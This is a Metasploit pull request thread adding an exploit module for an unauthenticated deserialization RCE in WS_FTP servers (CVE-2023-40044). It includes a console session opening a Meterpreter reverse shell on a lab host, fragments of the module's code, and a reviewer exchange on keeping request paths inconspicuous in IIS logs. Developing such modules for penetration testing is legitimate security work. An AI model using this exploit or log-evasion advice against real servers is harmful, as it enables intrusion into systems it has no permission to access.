Exploit module for CVE-2023-40044 (WS_FTP unauthenticated RCE)
rapid7/metasploit-framework pull request #18414
Opened 2023-10-02 10:48 UTC by sfewer-r7

This module exploits an unsafe .NET deserialization vulnerability to achieve unauthenticated remote code execution against a vulnerable WS_FTP server running the Ad Hoc Transfer module. All versions of WS_FTP server prior to 8.7.4 and 8.8.2 are vulnerable to this issue. The vulnerability was originally discovered by AssetNote.

For a full technical analysis of the vulnerability read the [Rapid7 AttackerKB Analysis](https://attackerkb.com/topics/bn32f9sNax/cve-2023-40044/rapid7-analysis).

```
msf6 exploit(windows/http/ws_ftp_rce_cve_2023_40044) > exploit

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Detected a build date of 28-2-2023
[*] Sending stage (200774 bytes) to 192.168.86.50
[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.50:49771) at 2023-10-02 11:46:47 +0100

meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > 
```

2023-10-02 15:23 UTC, jvoisin commented on documentation/modules/exploit/windows/http/ws_ftp_rce_cve_2023_40044.md
> +module was tested against `2020.0.1`. and `2022.0.1`.
Please use coherent version schemes: in "Vulnerable Application", "8.7.4 and 8.8.2" is mentioned, yet in "Testing", it's "2020.0.1. and 2022.0.1".

2023-10-02 15:23 UTC, jvoisin commented on modules/exploits/windows/http/ws_ftp_rce_cve_2023_40044.rb
> +          execution against a vulnerable WS_FTP server running the Ad Hoc Transfer module. All versions of WS_FTP server
```suggestion
          execution against a vulnerable WS_FTP server running the installed by default Ad Hoc Transfer module. All versions of WS_FTP server
```

2023-10-02 15:23 UTC, jvoisin commented on modules/exploits/windows/http/ws_ftp_rce_cve_2023_40044.rb
> +          prior to 8.7.4 and 8.8.2 are vulnerable to this issue. The vulnerability was originally discovered by AssetNote.
```suggestion
          prior to 8.7.4 and 8.8.2 are vulnerable to this issue.
```

2023-10-02 15:23 UTC, jvoisin commented on modules/exploits/windows/http/ws_ftp_rce_cve_2023_40044.rb
> +          ['URL', 'https://attackerkb.com/topics/bn32f9sNax/cve-2023-40044/rapid7-analysis'],
```suggestion
          ['URL', 'https://attackerkb.com/topics/bn32f9sNax/cve-2023-40044/rapid7-analysis'],
          ['URL', 'https://www.assetnote.io/resources/research/rce-in-progress-ws-ftp-ad-hoc-via-iis-http-modules-cve-2023-40044'],
```

2023-10-02 15:23 UTC, jvoisin commented on modules/exploits/windows/http/ws_ftp_rce_cve_2023_40044.rb
> +  def check
Shouldn't this method use `TARGET_URI`?

2023-10-02 15:23 UTC, jvoisin commented on modules/exploits/windows/http/ws_ftp_rce_cve_2023_40044.rb
> +    if title == 'Ad Hoc Transfer'
```suggestion
    if title != 'Ad Hoc Transfer'
      CheckCode::Unknown
    endif
```

Inverting the condition will reduce the nested indentation level :)

2023-10-02 16:41 UTC, sfewer-r7 commented on documentation/modules/exploit/windows/http/ws_ftp_rce_cve_2023_40044.md
> +module was tested against `2020.0.1`. and `2022.0.1`.
Good catch, thanks. I have addressed this in [1695a12](https://github.com/rapid7/metasploit-framework/pull/18414/commits/1695a12c9cdc5a5038fb9ebcb929e0a9fc7242b1).

2023-10-02 16:46 UTC, sfewer-r7 commented on modules/exploits/windows/http/ws_ftp_rce_cve_2023_40044.rb
> +  def check
The `TARGET_URI` is only used in the `exploit` method to trigger the vulnerability. The default value `/AHT/` works, but due to the how the underlying vuln works, you can change the `TARGET_URI` to be anything so long as it begins with `/AHT/`. You may want to do this to affect what appears in the IIS logs.

It would not make sense to use it in the `check` method as we want to get specific URI's to determine the vulnerable state of the target.

2023-10-02 16:50 UTC, sfewer-r7 commented on modules/exploits/windows/http/ws_ftp_rce_cve_2023_40044.rb
> +    if title == 'Ad Hoc Transfer'
I liked how the fall through for the `check` method ends with `CheckCode::Unknown` and there is no other path to return `CheckCode::Unknown`. 3 levels of indentation seems acceptable to me. Happy to do it differently if there is a preferred convention on this.

2023-10-02 21:46 UTC, jvoisin commented on modules/exploits/windows/http/ws_ftp_rce_cve_2023_40044.rb
> +  def check
You might want to either document this, or even better, simply use a random string?

2023-10-03 10:06 UTC, sfewer-r7 commented on modules/exploits/windows/http/ws_ftp_rce_cve_2023_40044.rb
> +  def check
Fair point, I will add some documentation around this. My thinking on keeping the `TARGET_URI` as `/AHT/` is that is looks less suspicious in the logs than using something like a random string, e.g the IIS logs entry:

```
2023-10-03 09:07:56 192.168.86.50 POST /AHT/ - 443 - 192.168.86.42 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36+Edg/114.0.1823.51 - 302 0 0 277
```

compared to this (I manually edited the below to create an example):

```
2023-10-03 09:07:56 192.168.86.50 POST /AHT/shfkshkjs - 443 - 192.168.86.42 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36+Edg/114.0.1823.51 - 302 0 0 277
```

However I wanted to keep the `TARGET_URI ` as a user option to allow for configuration if needed (e.g. testing detection rules or whatever).

2023-10-03 10:19 UTC, sfewer-r7 commented on modules/exploits/windows/http/ws_ftp_rce_cve_2023_40044.rb
> +          ['URL', 'https://attackerkb.com/topics/bn32f9sNax/cve-2023-40044/rapid7-analysis'],
Added the AssetNote reference in [2eacb75](https://github.com/rapid7/metasploit-framework/pull/18414/commits/2eacb75feb72a87bf68bb48262f0c436208e15c5)

2023-10-03 11:30 UTC, jvoisin commented
The download link for the free/trial version [has been taken down](https://twitter.com/MCKSysAr/status/1708844474489524584)

2023-10-03 16:07 UTC, smcintyre-r7 requested changes

2023-10-03 16:07 UTC, smcintyre-r7 commented on modules/exploits/windows/http/ws_ftp_rce_cve_2023_40044.rb
> +      execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))
This is no longer necessary. You should be able to completely remove this code, the mixin inclusion, and the target definition. Users can now use the powershell adapter payloads added in #16548 (one of `cmd/windows/powershell/*`).

As a module author, the adapters allow you to simply define the command target and the framework will handle the rest.

2023-10-03 16:07 UTC, smcintyre-r7 commented on modules/exploits/windows/http/ws_ftp_rce_cve_2023_40044.rb
> +    data << "\r\n"
Can this be updated to use the [rex-mime](https://github.com/rapid7/rex-mime) API?

2023-10-04 08:44 UTC, sfewer-r7 commented on modules/exploits/windows/http/ws_ftp_rce_cve_2023_40044.rb
> +    data << "\r\n"
Implemented in [8431d11](https://github.com/rapid7/metasploit-framework/pull/18414/commits/8431d116546aa01279b4ab212bc2928497370eb9)

2023-10-04 08:45 UTC, sfewer-r7 commented on modules/exploits/windows/http/ws_ftp_rce_cve_2023_40044.rb
> +      execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))
That's cool, I didn't realize this existed! Implemented in [1be8e02](https://github.com/rapid7/metasploit-framework/pull/18414/commits/1be8e0245b71b00b7eecb28de6b306ab9ea4f3d0)

2023-10-04 13:16 UTC, smcintyre-r7 approved these changes

2023-10-04 14:12 UTC, smcintyre-r7 commented
Code all looks good to me now. Due to Progress taking down the trail of WS_FTP, I was unable to get this installed. @sfewer-r7 shared a video demonstration of both the latest and a previous version along with the corresponding PCAPs which demonstrate that this exploit module is working as intended.

I'll have this landed in a moment. Thank you Stephen!

2023-10-04 14:23 UTC, merged

2023-10-04 14:25 UTC, sfewer-r7 commented
Super, thank you @smcintyre-r7 and @jvoisin for reviewing this.

2023-10-04 15:04 UTC, grantwillcoxh3ai commented
Quick question but shouldn't there be two targets for this? Documentation implies you can use the `windows/x64/meterpreter/reverse_tcp` payload and use a target 1 for Windows Powershell? Seems like the exploit only supports one target right now so just wanted to double check that.

2023-10-04 15:20 UTC, sfewer-r7 commented
good catch @grantwillcoxh3ai, thanks. I forgot to update the doc after commit [1be8e02](https://github.com/rapid7/metasploit-framework/pull/18414/commits/1be8e0245b71b00b7eecb28de6b306ab9ea4f3d0). I will submit a fix for this in a little while.

2023-10-04 16:06 UTC, sfewer-r7 commented
I opened #18424 to update the documentation, apologies for missing this first time around.

2023-10-04 18:35 UTC, grantwillcoxh3ai commented
All good, thanks for clarifying! :+1:

2023-10-06 14:36 UTC, jharris-r7 commented
# Release Notes 
This module exploits an unsafe .NET deserialization vulnerability to achieve unauthenticated remote code execution against a vulnerable WS_FTP server running the Ad Hoc Transfer module. All versions of WS_FTP server prior to 8.7.4 and 8.8.2 are vulnerable to this issue. The vulnerability was originally discovered by AssetNote.